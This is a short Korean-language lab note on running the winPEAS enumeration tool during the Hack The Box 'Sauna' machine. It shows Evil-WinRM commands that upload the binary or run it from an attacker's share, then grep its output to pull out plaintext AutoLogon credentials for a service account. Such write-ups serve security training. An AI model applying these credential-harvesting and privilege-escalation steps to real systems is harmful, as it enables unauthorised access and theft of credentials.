winPEAS

HTB Labs : Sauna

1. 개요

winPEAS 는 Windows 시스템에서 권한 상승을 하기 위해 취약점을 자동으로 찾아주는 정찰 도구.

2. 사용법

2.1. 기본 사용법

파일 자체를 Windows 에서 실행 시켜야 하기 때문에 공유 폴더로 만들거나 또는 업로드를 해줘야 한다.

2.1.1. 공유 폴더로 사용하는 경우

*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.14.143\share> .\winPEASx64.exe cmd fast > winpeas_fast

2.1.2. 파일 자체를 업로드 해서 실행시키는 경우

*Evil-WinRM* PS C:\Users\FSmith\Desktop> upload winPEASx64.exe
                                        
Info: Uploading /home/kali/labs/sauna/sauna-2/winPEASx64.exe to C:\Users\FSmith\Desktop\winPEASx64.exe                                                    
                                        
Data: 13525672 bytes of 13525672 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/19/2025   7:25 AM             34 user.txt
-a----       12/19/2025  11:24 AM       10144256 winPEASx64.exe


*Evil-WinRM* PS C:\Users\FSmith\Desktop> .\winPEASx64.exe cmd fast > winPEASfast

2.2. 실행 결과

해당 파일은 바이너리 파일이기 때문에 cat 으로 여는 경우 | grep “pass” 와 같은 문구가 먹히지 않는다. 그래서 string -e l 과 같이 파일을 연 다음에 grep 을 사용해야 한다.

원하는 내용이 비밀번호와 관련된 거라면 | grep “Pass” 와 같이 작성해 주면 Password 와 관련된 키워드로 확인할 수 있다.

┌──(root㉿kali)-[/home/kali/labs/sauna]
└─# strings -e l winpeas_fast | grep "Pass" 
[1;32mEnumerating saved credentials in Registry (CurrentPass)
    LimitBlankPasswordUse                :       1
   Password Last Set       :   7/26/2021 8:16:16 AM
   Password Last Set       :   1/1/1970 12:00:00 AM
   Password Last Set       :   1/22/2020 9:45:30 PM
   Password Last Set       :   1/22/2020 9:54:34 PM
   Password Last Set       :   1/23/2020 8:45:19 AM
   Password Last Set       :   1/24/2020 3:48:31 PM
    DefaultPassword               :  Moneymakestheworldgoround!
[1;32mPassword Policies
[1;37m    MaxPasswordAge: 
[1;37m    MinPasswordAge: 
[1;37m    MinPasswordLength: 
[1;37m    PasswordHistoryLength: 
[1;37m    PasswordProperties: 
[1;37m    MaxPasswordAge: 
[1;37m    MinPasswordAge: 
[1;37m    MinPasswordLength: 
[1;37m    PasswordHistoryLength: 
[1;37m    PasswordProperties: 
Google Password Sync?                   No   
    Disable Password Saving                 :       True
[1;32mCached GPP Passwords

그 다음에 원본 파일을 cat 으로 열던가 해서 직접 찾던가 아니면 다른 스트링으로 검색해서 계정 명까지 찾던가 해야 한다.

������������ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround
Updated on
whoami /groups